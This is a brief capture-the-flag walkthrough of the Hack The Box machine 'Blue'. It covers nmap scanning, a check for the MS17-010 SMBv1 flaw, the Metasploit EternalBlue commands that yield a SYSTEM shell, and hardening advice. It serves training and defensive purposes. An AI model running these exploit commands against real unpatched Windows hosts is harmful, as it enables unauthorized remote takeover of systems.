# HTB: Blue — Walkthrough Notes
**Platform:** Hack The Box | **OS:** Windows | **Difficulty:** Easy  
**Target IP:** 10.10.10.40 | **Date:** 2026-02-24

---

## Scope

Authorized lab environment — HTB retired machine. No real-world systems targeted.

---

## Enumeration

```bash
nmap -sV -sC -p- --open -T4 10.10.10.40
```

Key open ports:
- 135/tcp — MSRPC
- 139/tcp — NetBIOS
- 445/tcp — SMB (Microsoft Windows 7 / Server 2008 R2)

```bash
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.40
```

Result: `VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 (MS17-010)`

---

## Exploitation

Using Metasploit:

```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST <tun0>
run
```

Session opened as `NT AUTHORITY\SYSTEM`.

---

## Flags

- User flag: `C:\Users\haris\Desktop\user.txt`
- Root flag: `C:\Users\Administrator\Desktop\root.txt`

---

## Reinforcement Notes

1. **Disable SMBv1** — no legitimate modern workload requires it.
2. **Apply MS17-010 patch** — KB4012212 (Win7) / KB4012215 (Server 2008 R2).
3. **Network segmentation** — restrict SMB (445) at perimeter.
4. **EDR/logging** — instrument SMB traffic for anomaly detection.

---

*Writeup sanitized for public archive. Exact payload details kept in private authorized engagement notes.*